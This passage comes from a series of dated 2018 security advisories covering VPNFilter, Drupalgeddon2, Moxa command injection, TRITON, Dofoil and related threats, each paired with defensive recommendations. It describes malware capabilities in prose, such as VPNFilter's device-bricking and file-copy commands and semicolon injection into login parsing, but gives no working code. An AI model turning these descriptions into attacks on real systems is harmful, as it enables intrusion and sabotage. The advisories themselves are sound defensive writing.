Evaluate the quality of shared code, and fully test it for “outside cases” before implementation.

Integrate the use of shared code evaluation into the DevOps process.

Select and adopt a standard set of libraries for core application functions, and document and standardize on its implementation based on testing results.

Carefully select development languages at the start of any new project, taking into account the use of well developed core libraries essential to the success of the project.

Enterprise adopters:

Perform robust and regular testing of all application input functions at time of adoption and during major code updates or releases.

When possible, perform regular code audits of open source projects in use in the organization in order to discover similar failures.

When possible, encourage your software vendors to perform perform regular code audits in order to discover similar failures.  Ask them to share the results (under NDA or otherwise) so that proper risk decisions  and corrective actions can me made. 

Ultimately all organizations should be mindful of the ZipSlip vulnerability, patch currently identified vulnerable applications, and watch for additional discoveries. Remember, this specific exploit of a vulnerability has revealed previously unknown or only narrowly known general vulnerabilities that may enable many more exploits. 

Additional Resources

ZipSlip Overview:

https://securityboulevard.com/2018/06/zip-slip-vulnerability-affecting-thousands-of-apps-puts-systems-at-risk/

ZipSlip Release and White Paper:

https://snyk.io/research/zip-slip-vulnerability

Current list of known vulnerable software and patch status:

https://github.com/snyk/zip-slip-vulnerability

 

05/29/2018 New “VPNFilter” malware targets at least 500K networking devices worldwide.

Issue

Dubbed “VPNFilter” by Cisco’s Talos research group, this multi-stage, modular platform has versatile capabilities to support both intelligence-collection and destructive cyber attack operations. The first stage will persist through a device reboot, enabling downloads of other stages and full reinfection. It also redundantly maintains the IP address(es) of second stage deployments, enabling robust maintenance of the malware command and control (C2) environment even in the face of unpredictable changes, such as those occurring as system administrators attempt to track and remove malware. 

Impact

The code collects intelligence (scans) and has multiple attack features that can either execute additional commands or simply “brick” a device. From the Talos blog, “… the code of this malware overlaps with versions of the BlackEnergy malware — which was responsible for multiple large-scale attacks that targeted devices in Ukraine.” That overlap with known attack code and two separate upticks in malware on Ukrainian IP addresses in mid-May 2018 prompted Talos to release information before completing full analysis. 

VPNFilter includes modules to use the Tor anonymity network to mask C2 IP addresses and foster misattribution. It is designed to attack devices on the perimeter of the network, with no intrusion protection system (IPS) in place, and that typically do not have an available host-based protection system such as an anti-virus (AV) package.

Specific sequences in the malware include:

  • kill: Overwrites the first 5,000 bytes of /dev/mtdblock0 with zeros, and reboots the device (effectively bricking it).
  • exec: Executes a shell command or plugin.
  • tor: Sets the Tor configuration flag (0 or 1).
  • copy: Copies a file from the client to the bad actor’s remote server.

The inherent destructive capability is of particular concern because it allows the operators of this malware to ‘brick’ the network connections of any infected organizations. That would eliminate remote operations control for ICS/SCADA systems, as well as shut down any other network connections. The combination of intelligence gathering and mapping seems aimed at finding systems from which to launch effective attacks.

Recommendations

  • Reset SOHO routers and directly-connected NAS devices to factory settings, then update with up to date, non-vulnerable firmware.
  • Work with ISPs to reset devices provided by ISPs
  • For any directly connected device that may be infected or suspect, contact and work closely with manufacturers to ensure devices have up-to-date firmware and that they are not infected.
  • ISP should also work aggressively with customers to address potential problems.

This is a harbinger of IoT risks that will likely become more common. Look at the ‘heat’ map in the SDX Central article below to see this is, at least so far, clearly targeting or being tested against the Ukraine and appears to be a direct descendant of the previously-discovered Russian malware, BlackEnergy. It has, however, also been discovered in 54 other countries, so far. It is not going away.

Additional Resources

Cisco Talos Group blog warns of “VPNFilter” malware

https://blog.talosintelligence.com/2018/05/VPNFilter.html

SDX Central – Cisco Warms Massive Russian Malware Attack Hit 500K Routers Globally

https://www.sdxcentral.com/articles/news/cisco-warns-massive-russian-malware-attack-hit-500k-routers-globally/2018/05/amp/ 

IBM X-Force report on Russian malware BlackEnergy

https://exchange.xforce.ibmcloud.com/collection/BlackEnergy-Malware-e0bb9284e8eb3366b63f40eadf9e56c7 

 

05/21/2018 New PDF malware combines recent Windows & Adobe exploits

Issue

New PDF malware combines two zero day exploits discovered as recently as last week.  The malware, detected by anti-malware firm ESET, combines the most recent Windows & Adobe exploits to compromise Microsoft Windows operating systems.  The patches for the flaws being exploited have been available for a short period of time; Microsoft released their patches May 8th, with Adobe releasing security patches for Reader and Acrobat on May 14th.  The PDF malware in question compromises Window’s systems when users open an infected PDF on a vulnerable system.  Both the flaws offer remote command execution to the attacker, with the Windows flaw offering System level access. The major impact of this is that these are two new zero day exploits found in a malicious PDF file, in the wild.

Impact

The impact of combining two zero days into a lethal piece of malware could be devastating.  How many were hit before the patches?  The end result is not known at this time.  The sample identified by ESET did not contain a final payload, so the initial goal of the malware is not known.  That said, the malware is sophisticated and the zero day exploits embedded in it are more so. 

Recommendations

With zero day exploits in the wild it is usually too late to simply patch your systems.  By all means, we are not advocating delaying in patching your systems, but at this time it is advisable to engage in a full, internal hunt team to identify vulnerable and/or compromised systems.  This is a good reminder that we need to implement the basics first: patch/vulnerability management, software/data inventory, governance etc.  Once shored up, start to look at additional segmentation, access management, application firewalls and white listing.  Zero day exploits are in the wild, and our organizations have to evolve to be resilient against exploits we do not have patches for.

Additional Resources

Microsoft Patch for CVE-2018-8120

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8120

Adobe Security Bulletin:

https://helpx.adobe.com/security/products/acrobat/apsb18-09.html

Anton Cherepanov Blog on the two zero days found in PDF malware

https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/

 

05/14/2018 Industrial Control System product vendor Schneider Electric’s InduSoft and InTouch products contain critical security vulnerabilities.

Issue

Schneider Electric makes products that allow HMI clients to read, write, tags and monitor alarms and events.  Their InduSoft and InTouch software is vulnerable to remote compromise, and should be patched immediately.

Impact

Schneider Electric’s software is often deployed on critical Industrial Control systems, and it’s InduSoft and InTouch applications are vulnerable to remote compromise.  The vulnerable software runs with high privilege level, so compromised systems should be completely wiped and reinstalled before being put back into production.  Given the severity of the vulnerability, and the criticality of the systems we would rate the impact as high.

Recommendations

InGuardians recommends the following steps be taken:

  1. Identify if you run either of the two applications – software inventory
  2. If running the software, ensure that it is running on isolated network segments
  3. Check production systems for indicators of compromise
  4. Patch vulnerable systems &/or rebuild compromised systems

Additional Resources

Schneider Electric Security Bulletin LFSEC00000125

http://software.schneider-electric.com/pdf/security-bulletin/lfsec00000125/

Schneider Electric InduSoft Web Studio and InTouch Machine Edition Remote Code Execution (Tenable Research Advisory Detail)

https://www.tenable.com/security/research/tra-2018-07

 

Tenable Research Advisory: Critical Schneider Electric InduSoft Web Studio and InTouch Machine Edition Vulnerability

https://www.tenable.com/blog/tenable-research-advisory-critical-schneider-electric-indusoft-web-studio-and-intouch-machine

05/07/2018 Plaintext Passwords Exposed on Twitter and Github, Suggesting Password Safes and MFA

Issue

Last week, both Twitter and GitHub publicly announced that their services had exposed plaintext passwords in internal log streams. While neither company has disclosed a compromise, mature information security programs assume that at least one machine in the organization is under the control of a bad actor, and thus that any cleartext password must be replaced. While Twitter has begun requiring some users to change passwords and Github has made no such requirement, it would behoove all users of both Twitter and Github to assume their passwords are compromised.

Impact

If one or more bad actors have compromised either Twitter or GitHub, they may possess your organization’s credentials for the respective service. If your organization uses multi-factor authentication (MFA/2FA) for any accounts, the bad actors will likely not have gained access using those accounts.  

A GitHub account compromise produces significant risk in multiple ways. First, if a bad actor can alter code stored on GitHub that a user deploys to your or their own systems, they can achieve an indirect compromise of those systems and any systems accessible by them. Second, a bad actor may find access credentials, private certificate keys, or other secrets stored in GitHub. InGuardians often finds this kind of data in its red team penetration tests, particularly API keys that provide full cloud service administration capabilities. Finally, when targeting a DevOps environment, a bad actor with GitHub access gains full knowledge of routing, firewall and system provisioning code.

Recommendations

InGuardians recommends changing all organization accounts on both Twitter and GitHub. Given the tendency for code and data to proliferate to both personal and business GitHub accounts, InGuardians recommends requiring all staff to change their personal and business GitHub passwords and implement multi-factor authentication on that platform.  

InGuardians also recommends deploying password safe software or hardware, whether free or commercial, to ensure that every password an organization uses is unique. Bad actors will gain access to passwords – to understand, contain and recover from the damage, its important to make sure that compromised passwords are useful only on one service.

Further, InGuardians recommends conducting a quarterly internal review of what code, data and secrets lie in GitHub repositories, to both understand and reduce the amount of sensitive or secret information is entrusted there.

Additional Resources

Twitter Admits Recording Plaintext Passwords in Internal Logs, Just Like GitHub

https://www.bleepingcomputer.com/news/security/twitter-admits-recording-plaintext-passwords-in-internal-logs-just-like-github/

GitHub Accidentally Recorded Some Plaintext Passwords in Its Internal Logs

https://www.bleepingcomputer.com/news/security/github-accidentally-recorded-some-plaintext-passwords-in-its-internal-logs/

 

04/30/2018 Multiple known Java and HPE iLO vulnerabilities being targeted for ransomware

Issue

Software management is often boring. It is, however, essential to business survival. The many “new” attacks the grab media attention all too often exploit known vulnerabilities for which patches have been published – and missed or ignored. Atlanta’s recent ransomware attack exploited Java’s deserialization bug, which was called the most under-hyped vulnerability of 2015. 

It’s is NOT just Java. HPE iLO, an integrated remote management console for HP servers, has many known vulnerabilities. They are now being hit with disconnect and lock out ransom demands. This one may not be encrypting drives, but instead is remotely locking out administrators. The effect and impetus for ransom is the same.

Impact

Atlanta’s one case has so far incurred $2.6 million in external consulting costs, there is no capture of internal costs or disruption effects, and as of this writing Atlanta’s departments are still using paper and other offline tools. In many commercial environments, this is a business killer. The iLO attacks effectively take servers offline – they are no longer under your control. 

Any unpatched or unresolved vulnerability is opportunity for exploitation and disaster. Delays in patching increase the window of vulnerability and the likelihood of exploitation. A ‘standardized’ weekly or monthly or worse patch cycle, if known publicly, advertises an organization’s unpreparedness. E.g., Outfit A, Inc., patches on first Mondays of the month; a vulnerability and patch are published in the second week; attackers can posit Outfit A will remain vulnerable AT LEAST 3 weeks … and maybe even into more than one cycle.

Recommendations

1. Do frequent and aperiodic vulnerability assessments. Scan for vulnerabilities and create a realistic, prioritized, ACTION list.

2. Pay attention to other organizations, news, and vulnerability announcements.

3. PATCH. Just Do It. When patches are more complex, mitigate with layered defenses and architecture – network segmentation.

4. Review policy and architecture to ensure systems that should NOT face the internet, such as HPE iLO interfaces, DON’T.

5. And do not let anyone tell you to relax, it’s only a “theoretical vulnerability.” Ever.

In 2015 the Java vulnerabilities “were considered to be theoretical and hard to exploit.”(1)

STOP. That mistaken viewpoint goes back decades – was wrong then and is wrong now. 

Additional Resources

Atlanta fall-out continues

2018 – Atlanta projected to spend at least $2.6 million on ransomware recovery

https://www.zdnet.com/article/atlanta-spent-at-least-two-million-on-ransomware-attack-recovery/

This is NOT new – it’s been skipped and left to fester:

2015 – Java Serialization Vulnerability Threatens Millions of Applications

https://www.contrastsecurity.com/security-influencers/java-serialization-vulnerability-threatens-millions-of-applications

… and it persists

2018 – Cisco Secure Access Control System Java Deserialization Vulnerability

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180307-acs2

(1) 2016 – Lessons Learned from the Java Deserialization Bug

https://www.paypal-engineering.com/2016/01/21/lessons-learned-from-the-java-deserialization-bug/

And it is NOT just Java

2018 – Ransomware Hits HPE iLO Remote Management Interfaces

https://www.bleepingcomputer.com/news/security/ransomware-hits-hpe-ilo-remote-management-interfaces/

The CVE list of HPE iLO vulnerabilities:

https://www.cvedetails.com/vulnerability-list/vendor_id-10/product_id-23648/HP-Integrated-Lights-out-4-Firmware.html

04/23/2018 Attackers Compromising Drupal-based Web Sites En Masse for Financial Gain

Issue
Attackers are using two vulnerabilities, including Drupalgeddon2, to compromise Drupal installations, install DDoS and currency-mining malware, and attack non-Drupal machines made accessible by that foothold.

Impact
The impact for organizations which run Drupal now (or ran it at any time since March 28th, 2018) is severe. Multiple organized criminal groups have raced to exploit the first vulnerability, named Drupalgeddon2. The most prolific uses malware named “Muhstick,” which infects a host, then spreads to other machines using SSH and WebDav, as well as exploits against the Drupalgeddon2 vulnerability and vulnerabilities in Oracle’s WebLogic, ClipBucket, Webuzo, and the WordPress content management system. Muhstick is a variant of Tsunami, which has infected tens of thousands of Linux hosts. Muhstick has built a botnet from servers and Internet of Things (IoT) “smart devices,” allowing it to scan the Internet for vulnerable hosts very quickly.

Recommendations
For any site that ran Drupal since March 28th, it’s critical to patch the Drupal software immediately. InGuardians further recommends assuming that Internet-facing Drupal installations have been compromised, until that assertion can be ruled out. The Muhstik malware doesn’t spread only using software vulnerabilities. It also scans for SSH servers, trying both a pre-populated set of password possibilities as well as credentials that it finds on the system from which it runs. If Muhstik compromised a single Drupal system, it has likely spread to other systems.

InGuardians has seen many clients use a best practice approach to content management system-provided websites. These clients bifurcate their Drupal application servers into two servers: an internal dynamic server and an external static server. The internal server runs the content management system (Drupal) to allow organization staff to update the site’s content. On any update, this server pushes a static mirror of the site to the external server.  The external server serves content statically, exposing far less code to attackers. This can be accomplished on Drupal using the Static Generator module.

Additionally, InGuardians recommends disallowing root login via SSH and relocating the SSH server port from 22 to a less well-known number. These two measures massively reduce the number of successful SSH-based attacks, whether in initial infection or lateral movement.

Additional Resources
Drupal Patch Instructions for Drupalgeddon2
https://www.drupal.org/sa-core-2018-002

Drupal Static Generator Module
https://www.drupal.org/project/static

Botnet Muhstik is Actively Exploiting Drupal CVE-2018-7600 in a Worm Style (Netlab at 360.com)
https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/

Big IoT Botnet Starts Large-Scale Exploitation of Drupalgeddon 2 Vulnerability (Bleeping Computer)
https://www.bleepingcomputer.com/news/security/big-iot-botnet-starts-large-scale-exploitation-of-drupalgeddon-2-vulnerability/

04/16/2018 Researchers Can Hijack ATI Systems’ Emergency Alert Sirens Using Software Defined Radio (SDR)

Issue
Security researchers at Bastille Networks were able to capture, analyze and replay packets to trigger emergency alert sirens in the city of San Francisco provided by ATI Systems.  Over a 2 year period, researchers captured the weekly transmission to initiate system tests.  Upon analyzing the captured radio protocol, it was discovered that the transmissions were neither encrypted nor authenticated.

While the ATI Systems emergency alert sirens are a unique implementation, the vulnerability in these systems extends to those installed outside of San Francisco, with identical systems deployed across the globe.  Attacks against these types of systems are not unique, as it is theorized similar attacks were used in the erroneous activation of the Tornado Warning sirens. In Dallas, Texas

Adoption of proprietary Radio Frequency (RF) systems is quite common in both legacy and current systems.
InGuardians often finds that organizations do not have an accurate inventory of RF-enabled systems in their environment, nor do they understand the overall implications of compromise of the unknown RF-enabled systems.

Impact
This proof of concept is specific to the ATI Systems implementations, which by design, could cause widespread panic should the emergency sirens be triggered by an attacker.  However, a bad actor or researcher could use the overall methodology and tools for discovering an attack surface for this system on other RF-enabled systems.  Overall impact to an organization will depend on the affected system discovered and analyzed, but it is not outside the realm of possibility that there could be pecuniary or life safety issues.

With the increased development in Software Defined Radio (SDR) and expertise in these tools being gained by the security community, RF protocols that formerly enjoyed “security through obscurity” are unlikely to remain free from attack much longer.  This becomes particularly challenging in legacy systems where the RF protocols were designed with obscurity as the only security measure either due to lack of available technology, or little future consideration in technology advancements.

Recommendations
InGuardians recommends its clients perform or commission an overall discovery of RF-enabled systems in the enterprise environment, followed by a thorough risk analysis. Should the risk impact be determined to be elevated for any of the discovered systems, it is recommended, at a minimum, to contact the vendor to in order to determine methods in use for securing, encrypting, and performing authentication of transmissions.  Should the answers from the vendor be insufficient, or the RF-enabled systems be critical to the operation of the business, a thorough review and analysis of the RF transmissions should be performed.

Additional Resources
Sirenjack
https://www.sirenjack.com

Dallas Tornado Siren Hack [Washington Post]
https://www.washingtonpost.com/news/the-intersect/wp/2017/04/09/someone-hacked-every-tornado-siren-in-dallas-it-was-loud/

04/09/2018 Security vulnerabilities in two Moxa Industrial Control Systems (ICS) devices

Issue
There are security vulnerabilities in two Moxa ICS devices: MXview network management software and the AWK-3131A 802.11n ICS wireless gear.    The management software has a flaw that would allow an attacker to view/retrieve the cryptographic key on the server.  The wireless gear has a flaw that allows an unauthenticated user to execute commands on the system.Impact
The first vulnerability affects Moxa’s AWK-3131A 802.11n ICS wireless network gear.  This was reported initially by Cisco Talos in December 2017, and patched by Moxa on April 3.  The vulnerability is present due to the way Moxa is using ‘loginutils’ to parse failed logins, allowing attackers to use a semicolon to terminate the login and follow it with a command to be executed.  Cisco Talos has stated that it believes the web front end is  also vulnerable to the attacks, as it also uses ‘loginutils’ to parse the failed logins.  The vulnerability was successfully exploited via ‘Telnet’, ‘SSH’, and the local management console.

The second vulnerability is in Moxa’s MXview network management software, and allows an attacker to retrieve the private key for the server.  Obtaining the cryptographic private key would allow the attacker to decrypt files and traffic.  The flaw is considered severe enough for DHS to have issued an advisory on April 5.  This follows a flaw in the same product discovered in January, which allows attackers to use an “unquoted search path” in order to execute code or gain access to files on the server.

Recommendations
First and foremost, it is important to deploy ICS devices on an isolated network segment to ensure that they are not accessible from the Internet.  InGuardians recommends that you deploy ICS networks and devices behind firewalls and other network controls, isolating them from the business network.  InGuardians also recommends performing routine risk assessments to ensure that controls and audit measures are working properly.

As for these specific vulnerabilities, Moxa released patches last week (link in the Additional Resources below).

Additional Resources
DHS advisory:
https://ics-cert.us-cert.gov/advisories/ICSA-18-095-02

NCCIC document on recommended practices for securing ICS
https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf

* Moxa MXview advisory:
https://www.moxa.com/support/faq/faq_detail.aspx?id=2717

* Moxa MXview site: 
https://www.moxa.com/support/sarch_result.aspx?type=faq&prod_id=622&type_id=7

* Moxa AWK-3131A
https://www.moxa.com/product/AWK-3131A.htm

*N.B. the Moxa site is badly designed, with no clear and easy way to view security updates and advisories.

04/02/2018 Drupal CMS High-Critical Remote Code Execution Vulnerability

Issue
Security researchers have discovered and publicly released several Highly-Critical Remote Code Execution (RCE) vulnerabilities in Drupal versions 7 through 8.5, as well as the end-of-lifed version 6.  Due to the serious nature of these remote code execution vulnerabilities, Drupal has released patches for older, unsupported versions including version 6.

The Drupal Content Management System (CMS) powers 6% of the 10,000 most popular public web sites. Over 647,000 publicly-accessible web sites use this software. This may increase the risk that bad actors may either quickly attack companies running Drupal or will create and release malware targeting this software.

Remote code execution vulnerabilities like these allow an attacker to execute code of their own choosing on an unpatched installation. This could ultimately result in full system compromise and/or allow the attacker to move laterally to compromise other machines, including those on internal network segments.

InGuardians often finds that organizations do not have an accurate inventory of Internet-facing hosts or the applications which they host.  In these cases, application vulnerabilities are particularly challenging to defend, as it is impossible to update software that isn’t known to the patch management staff.

Impact
Unless Drupal CMS versions are updated to 7.58 or 8.51,  it is possible for an attacker to gain full control of the affected system. Drupal CMS version 6 permits the same behavior unless patched against SA-CORE-2018-2. Depending on the attacker’s skillset, as well as the defender’s level of network segmentation, it is possible that an attacker could take full control of the defender’s infrastructure.

Recommendations
InGuardians recommends immediate patching of the Drupal content management system (CMS) across all versions.  Until such time as a patch can be applied, InGuardians recommends that affected organizations restrict access severely to a few trusted IP addresses.  This restriction should only be utilized to perform appropriate upgrades and patches, before restoring full access.

This is also the perfect opportunity to undergo an aggressive look at internet-facing resources in order to develop an accurate inventory, with the intent of finding previously unknown assets including Drupal.  Upon completion of internet-facing asset discovery, InGuardians recommends performing a similar discovery on internal network segments.

Additional Resources 
Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002
https://www.drupal.org/sa-core-2018-002
FAQ about [Security Advisory] SA-CORE-2018-002
https://groups.drupal.org/security/faq-2018-002
[Content Management System] CMS Usage Statistics
https://trends.builtwith.com/cms

03/28/2018 Municipal governments battle cyber attacks.

Issue
The Georgia cities of Atlanta and Loganville are the latest victims in an ongoing trend of attacks on municipalities. First, on Thursday, March 22nd, the City of Atlanta announced that its networks had been shut down due to a ransomware attack. At the time of this posting, the city is working with the FBI and the Department of Homeland Security, as well as external partners from Microsoft and Cisco’s cybersecurity response team, to investigate the situation.

The City of Loganville (a suburb of Atlanta), announced on Monday, March 26th on its Facebook page that an external threat actor had successfully perpetrated a breach of an internal server. The Loganville breach may not be related to that of Atlanta.

Impact
In Atlanta, the ransomware has cut off electronic access to court records, while many departments are using pen and paper to perform their duties. Many city services, such as electronic bill pay, are still unavailable to city residents. As a precautionary measure, the public wireless network (Wi-Fi) at Hartsfield-Jackson airport has also been suspended.

Evidence suggests the Atlanta malware is SamSam, which has been seen in other government targeted attacks, like the one that occurred at Colorado’s state Department of Transportation.  In particular, the letter shared by local media during the early stages of the ransomware infection in Atlanta is clearly a SamSam ransom note.The wording — including typos — is identical to the examples shared by researchers working for Cisco’s Talos group earlier this year. The only difference was the directory where the contact portal is hosted.

Once attribution to SamSam became public knowledge, the SamSam group deleted the contact portal that the city of Atlanta would use to make payment. Given the SamSam group’s actions, it isn’t clear if payment is even possible now. While it is possible other portals exist for the systems infected in Atlanta, the city hasn’t released any technical details to the public.

In Loganville, the breach is believed to have exposed personally identifiable information, (PII) such as social security numbers, to the attacker.

Recommendations
InGuardians echoes the sentiments of the newly elected Atlanta Mayor who is quoted as saying, “this is bigger than a ransomware attack, it’s an attack on government and therefore an attack on all of us.”

It is increasingly apparent that organizations must make the resources available and establish effective policies and preventative measures to strengthen their security postures in order to mitigate these threats.

InGuardians recommends that all leaders of municipal governments view themselves as a likely soft target and create internal Information Security programs to address the emerging threats. We also recommend that all business leaders continue to follow this case for lessons learned, such as:

  • Do not leave Remote Desktop Protocol (RDP), Windows Server Message Block (SMB), Secure Shell (SSH) or Telnet available to the Internet – use VPNs and firewall white lists
  • Confirm that no operations systems use SMB version 1
  • Apply Windows group policy objects (GPOs) to harden government systems uniformly
  • Do not allow users to have local administrative privilege on their desktop machines
  • Make sure that all patches are deployed quickly – malware victims have lost a race with an attacker

Additional Resources

Small Towns Confront Big Cyber Risks (GovTech)
http://www.govtech.com/security/GT-OctoberNovember-2017-Small-Towns-Confront-Big-Cyber-Risks.html

Atlanta Working “Around the Clock” to Fight Off Ransomware Attack (NPR)
https://www.npr.org/sections/thetwo-way/2018/03/27/597208778/atlanta-working-around-the-clock-to-fight-off-ransomware-attack

We Are a Resilient City – Atlanta Works to Move Forward Following Cyber Attack (11Alive)
http://www.11alive.com/article/news/we-are-a-resilient-city-atlanta-works-to-move-forward-following-cyber-attack/85-532179763

Metro Atlanta City Reports Its Own Data Breach (Atlanta Journal Constitution)
https://www.ajc.com/news/local-govt–politics/metro-atlanta-city-reports-its-own-data-breach-warns-customers/GsK565pH9L8y3GOk0NvERI/

Atlanta’s Computers Crippled by Ransomware – Issues Unresolved After 4 Days (SmartCities Dive)
https://www.ciodive.com/news/fbi-ransomware-attack-atlanta/519865/

03/19/2018 New DHS alert on breaches of power grid and other control systems

Issue

Disabling safety or security controls invalidate risk assessment and mitigation.  It won’t matter if the control was disabled by a hacker or by an employee.

New information is surfacing about breach of control systems first identified in August 2017.  One conceptual flaw and one implementation or operating error combined to defeat safety systems and shut down systems.

In a SCADA environment, the TRICONEX system is a sound concept, using triple redundancy comparison of signals as a check of proper operating conditions. If one of the 3 is different, the system enters a safety condition with appropriate alerts and changes. That could mean opening vales to increase cooling, or shutting fuel valves to stop machinery. The firmware of the controllers can, of course, be updated.

To ensure security, a physical switch is used to change it from “read only” to “read-write” for updates. A variety of implementation factors, from remote locations to limited personnel managing large automated systems, may have contributed to operators leaving systems in read-write. In at least one case, one of the maintenance management computers was compromised allowing hackers access to now fully modifiable controllers. In another case, the SCADA system was on a larger network and not properly isolated from external connections leaving it vulnerable to external penetration.

Remote network access to systems enabled hackers to destroy hard drives inside the company’s computers and their data was wiped clean. (NYT). It also appears that only an error in the attack code prevented physical damage and possibly explosions.

Impact

InGuardians’ clients may be at LOW risk for the specific attacks used against these Industrial Control Systems (ICS).

However, the broader issue of increased risk from “work arounds” which inevitably occur in every business may be negating what you think is in place for risk mitigation. The focus is NOT on malicious employees, but on those trying to succeed in the face of unintended policy conflicts. Too few people required to do detailed checks on too many systems too widely separated or remotely located is only one of the sorts of situations that creep in to daily ops.

Recommendations

Review ACTUAL operating conditions and procedures compared to policy. Third party audits or interdepartmental audit teams provide fresh perspectives.

Think more like an attacker. Be less sure – “my door is locked, I can relax” – and more – “the door has a lock but how would it get picked? Broken? Simply evaded?  If it was picked, how would I know”.  Red Teams don’t simply do set penetration tests, but use creative thinking to find the unexpected gaps, the new approaches. Those attacking your systems don’t have any rules.

Additional Resources

US CERT:

https://www.us-cert.gov/ncas/alerts/TA18-074A

NY TIMES:

https://www.nytimes.com/2018/03/15/technology/saudi-arabia-hacks-cyberattacks.html

WIRED:
https://www.wired.com/story/triton-malware-dangers-industrial-system-sabotage/

03/12/2018 Dofoil trojan variant used to install cryptocurrency-mining malware

Issue
Microsoft’s Windows Defender Research group identified a new variant of the Win32/Dofoil remote access trojan which installed a cryptocurrency miner for Electroneum (ETN) coin.

Impact

The impact of this trend is severe, due in part to the trojan’s ability to download and execute code on command.  The Dofoil family of trojans give the attackers full command and control of the compromised system. In addition to crypto mining, the trojan has previously been used to install ransomware and other malicious code.

In this latest attack, Dofoil used a technique known as process hollowing, copying legitimate binaries for explorer.exe and swapping malware in its place.

Many attackers are using cryptocurrency mining as a major revenue stream.  During the WannaCry outbreak, at least two other groups used the same exploits to install crypto miners and subsequently earn millions of dollars (far better than the WannaCry authors fared.)

Recommendations

InGuardians recommends having a robust segmented network, with good instrumentation of inbound and outbound traffic.  Organizations can use network and host monitoring tools that identify unusual behavior and activity to help identify and contain malware outbreaks.  Some of the tools that can be used for detection and containment are Bro, Snort, and Windows Defender. Many anti-malware and threat protection services claim to detect and protect against cryptocurrency miners.

Detection of cryptocurrency miners is typically done by identifying the installation, code injection, or persistence mechanisms, as well as the coin mining itself.  While the miners that we are discussing here are hidden in running processes, there are many implementations of JavaScript miners that run in browsers.

In addition to segmentation and instrumentation, InGuardians recommends having solid backup and recovery solutions in place.  These should be tested on a regular basis, with verification of the recovered systems.

Additional Resources

Win32/Dofoil (Microsoft Windows Defender Security Intelligence)

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32%2FDofoil

DoFoil: Crypto-mining Malware Outbreak Infects 500,000 Computers In One Day (Newsweek)

http://www.newsweek.com/crypto-mining-malware-outbreak-infected-500000-computers-single-day-836145

The State of Malicious Crypto-mining (MalwareBytesBlog)

https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/

03/05/2018 Widespread SSL Certificate Revocation Disrupting Internet Transport Encryption with Further Disruption Planned for April and October

On Wednesday, Trustico (a Symantec reseller) triggered the revocation of roughly 23,000 SSL/TLS certificates, in advance of April and October’s certificate disruptions on any certificate sold under the brands Symantec, GeoTrust, Thawte, and RapidSSL.

While the April deadline for Symantec, GeoTrust, Thawte and RapidSSL certificates looms, Trustico’s method of revocation has caused further concern. Trustico wanted to move its customers from roughly 50,000 Symantec-provided certificates to new ones provided by Comodo. Digicert, who had purchased Symantec’s certificate business, initially refused, on the basis that it would only revoke so many certificates in the case of a security breach. Trustico’s CEO then e-mailed 23,000 certificates’ private keys without encryption to Digicert, thus creating a breach. The breach was compounded when a remote code execution vulnerability was found in Trustico’s website.

This situation calls into question Trustico’s practices as a certificate reseller. First, certificate vendors should not retain private keys. Second, Trustico’s choice to e-mail private keys put all communications using those keys at risk and may have failed to give customers the opportunity to replace the certificates before this risk window.

Impact
Any organization using one of the revoked Trustico-resold Symantec SSL certificate has lost the integrity of HTTPS connections to any server using that certificate. Users will generally see an untrusted connection error  immediately and many will understand that a problem exists. Further, any organization using a Symantec certificate, including those branded as GeoTrust, Thawte and RapidSSL, will face a similar problem on April 17th or in October, at which point Google’s Chrome and Mozilla’s Firefox browsers will begin stating that the certificates are untrusted. See the schedule below (under “Recommendations”) for more detail.

Recommendations
InGuardians strongly recommends that organizations audit their SSL/TLS certificates, determining which have been provided by Symantec, GeoTrust, Thawte and RapidSSL. Staff should replace every certificate provided by these companies well before the following deadlines:

April 17th: Certificates issued before June 1, 2016 will not work with Chrome 66.

May: Certificates issued before June 1, 2016 will not work with Firefox 60.

October: Certificates will no longer be trusted, as of Firefox 63.

October 23rd: Certificates will no longer be trusted, as of Chrome 70.

Organizations can use a number of tools to check its SSL/TLS certificates, whether for its web servers or its other SSL/TLS-enabled services. The popular open source tool, nmap, will display information about the certificate enabled on one or more ports, like so:

nmap -v -sT -p 443 –script=ssl-cert www.inguardians.com | egrep ‘(Issuer|valid)’
| Issuer: commonName=GeoTrust RSA CA 2018/organizationName=DigiCert Inc/countryName=US/organizationalUnitName=www.digicert.com
| Not valid before: 2018-01-25T00:00:00
| Not valid after:  2019-02-24T12:00:00

Organizations should be careful to check all ports on a system, and not just the standard service ports for SSL/TLS.Additional Resources
Google: “Chrome’s Plan to Distrust Symantec Certificates”
https://security.googleblog.com/2017/09/chromes-plan-to-distrust-symantec.html

Mozilla: “CA:Symantec Issues”
https://wiki.mozilla.org/CA:Symantec_Issues

DigiCert: “How do you handle mass revocation requests?”
https://groups.google.com/forum/#!msg/mozilla.dev.security.policy/wxX4Yv0E3Mk/QZt8UPhKAwAJ

Trustico® Abandons Symantec® SSL Certificates
https://www.trustico.com/news/2018/abandons/trustico-abandons-symantec.php

02/26/2018 Increased attacker focus on exposed cloud services, specifically AWS Simple Storage Service (S3) Buckets

Issue

Amazon’s cloud-based Simple Storage Service Buckets, colloquially referred to as “S3 Buckets”, have been a recent focus of attackers and security researchers.  With the advent of new open source and publicly-available tools to search for improperly configured S3 buckets, bad actors and information security firms have found many cases where the buckets’ owners have inadvertently granted access to every user on the Internet.
Internet-accessible S3 buckets have multiple risks. In cases of world-wide read-only access, the discoverers have found personally-identifiable information (PII) and other sensitive data. In at least one case of world-wide write access, the discoverer found a production website hosting content directly from the bucket, such that any Internet user could alter the website’s content.  A bad actor could drastically change the overall presentation of the site and would likely add hostile JavaScript code that would run in every visitor’s browser, including key-loggers or crypto-coin mining clients. When discovered, this could ultimately reduce customer faith in the company owning the S3-backed site.
In moving to cloud-hosted services, many organizations have failed to heed widespread warnings with this message:
Organizations must secure and monitor cloud-based services just as strongly as with traditional on-premise infrastructure.

Impact

Impact from exposure of Amazon S3 is varied, depending on an organization’s adoption and configuration of Amazon’s cloud-based storage infrastructure:

